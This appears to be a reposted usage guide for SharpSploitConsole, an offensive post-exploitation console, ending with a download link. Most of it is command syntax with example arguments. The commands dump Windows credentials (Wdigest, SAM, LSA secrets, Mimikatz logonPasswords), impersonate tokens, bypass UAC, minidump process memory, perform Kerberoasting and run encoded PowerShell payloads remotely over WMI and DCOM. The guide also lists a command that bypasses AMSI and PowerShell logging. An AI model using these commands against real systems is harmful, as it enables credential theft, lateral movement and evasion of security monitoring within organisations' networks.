Retrieve Wdigest credentials from the registry – requires admin or system:
Wdigest

Retrieve current user:
whoami
Username

Impersonate system user – requires admin rights:
GetSystem

Impersonate the token of a specified process, requires pid – requires admin rights:
Impersonate 2918

Bypass UAC – requires binary | command | path to binary – requires admin rights:
BypassUAC cmd.exe ipconfig C:\Windows\System32\
BypassUAC cmd.exe "" C:\Windows\System32\

Ends the impersonation of any token, reverts back to the initial token associated with the current process:
RevertToSelf

Retrieve current working directory:
CurrentDirectory

Retrieve current directory listing:
DirectoryListing

Changes the current directory by appending a specified string to the current working directory:
ChangeDirectory SomeFolder

Retrieve hostname:
Hostname

Retrieve list of running processes:
ProcessList

Creates a minidump of the memory of a running process, requires PID | output location | output name – requires admin:
ProcDump 2198 C:\Users\Username\Desktop memorydump.dmp

Retrieve registry path value, requires full path argument:
ReadRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\BuildNumber

Write to registry, requires full path argument and value argument:
WriteRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\RemoteAccessEnabled 1

Retrieve users of a local group remotely, requires computername | groupname | username | password:
NetLocalGroupMembers computerName Administrators domain\username P@55w0rd!
NetLocalGroupMembers 192.168.1.20 Administrators .\username P@55w0rd!

Retrieve local groups remotely, requires computername | username | password:
NetLocalGroups computerName domain\username P@55w0rd!
NetLocalGroups 192.168.1.20 .\username P@55w0rd!

Retrieve currently logged on users remotely, requires computername | username | password:
NetLoggedOnUsers computerName domain\username P@55w0rd!
NetLoggedOnUsers 192.168.1.20 .\username P@55w0rd!

Retrieve user sessions remotely, requires computername | username | password:
NetSessions computerName domain\username P@55w0rd!
NetSessions 192.168.1.20 .\username P@55w0rd!

Ping systems, requires computernames:
Ping computer1 computer2 computer3 computer4

Port scan systems, requires computername | ports:
PortScan computer1 80 443 445 22 23

Get Domain Users – grabs specified (or all) user objects in the target domain, by default using the current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target:
GetDomainUsers

Get Domain Groups – grabs specified (or all) group objects in the target domain, by default using the current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target:
GetDomainGroups
GetDomainGroups -target "Domain Admins"

Get Domain Computers – grabs specified (or all) computer objects in the target domain, by default using the current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target:
GetDomainComputers

Perform Kerberoasting – performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default using the current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target:
Kerberoast
Kerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlService

Run command remotely via WMI, requires computername | username | password | command – requires admin:
WMI computer1 domain\username P@55w0rd! <entire powershell empire payload>
WMI computer1 .\username P@55w0rd! powershell -noP -sta -w 1 -enc <Base64>

Run command remotely via DCOM, requires computername | command | directory | params – requires admin:
DCOM computer1 cmd.exe c:\Windows\System32 powershell -noP -sta -w 1 -enc <Base64>

Run shell command:
Shell ipconfig /all

Run a PowerShell command while attempting to bypass AMSI, script block logging and module logging:
Powershell -noP -sta -w 1 -enc <Base64>

Currently available options (more to come)
Interact : Starts interactive console mode; if you are interacting remotely you may not want to use this option
Mimi-All : Executes everything but DCSync, requires admin
Mimi-Command : Executes a chosen Mimikatz command
logonPasswords : Runs privilege::debug sekurlsa::logonPasswords
LsaCache : Retrieve Domain Cached Credentials hashes from the registry
LsaSecrets : Retrieve LSA secrets stored in the registry
SamDump : Retrieve password hashes from the SAM database
Wdigest : Retrieve Wdigest credentials from the registry
whoami : Retrieve current user
GetSystem : Impersonate system user, requires admin rights
Impersonate : Impersonate the token of a specified process, requires pid – requires admin rights
BypassUAC : Bypass UAC, requires binary | command | path to binary – requires admin rights
RevertToSelf : Ends the impersonation of any token, reverts back to the initial token associated with the current process
CurrentDirectory : Retrieve current working directory
DirectoryListing : Retrieve current directory listing
ChangeDirectory : Changes the current directory by appending a specified string to the current working directory
Hostname : Retrieve hostname
ProcessList : Retrieve list of running processes
ProcDump : Creates a minidump of the memory of a running process, requires PID | output location | output name – requires admin
Username : Retrieve current username
ReadRegistry : Retrieve registry path value, requires full path argument
WriteRegistry : Write to registry, requires full path argument | value
NetLocalGroupMembers : Retrieve users of a local group remotely, requires computername | groupname | username | password
NetLocalGroups : Retrieve local groups remotely, requires computername | username | password
NetLoggedOnUsers : Retrieve currently logged on users remotely, requires computername | username | password
NetSessions : Retrieve user sessions remotely, requires computername | username | password
Ping : Ping systems, requires computernames
PortScan : Port scan systems, requires computername | ports
GetDomainUsers : Grabs specified (or all) user objects in the target domain, by default using the current user context
GetDomainGroups : Grabs specified (or all) group objects in the target domain, by default using the current user context
GetDomainComputers : Grabs specified (or all) computer objects in the target domain, by default using the current user context
Kerberoast : Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default using the current user context
WMI : Run command remotely via WMI, requires computername | username | password | command – requires admin
DCOM : Run command remotely via DCOM, requires computername | command | directory | params – requires admin
Shell : Run a shell command
Powershell : Runs a PowerShell command while attempting to bypass AMSI, script block logging and module logging

Download SharpSploitConsole

Link: http://feedproxy.google.com/~r/PentestTools/~3/kATTdJ2komM/sharpsploitconsole-console-application.html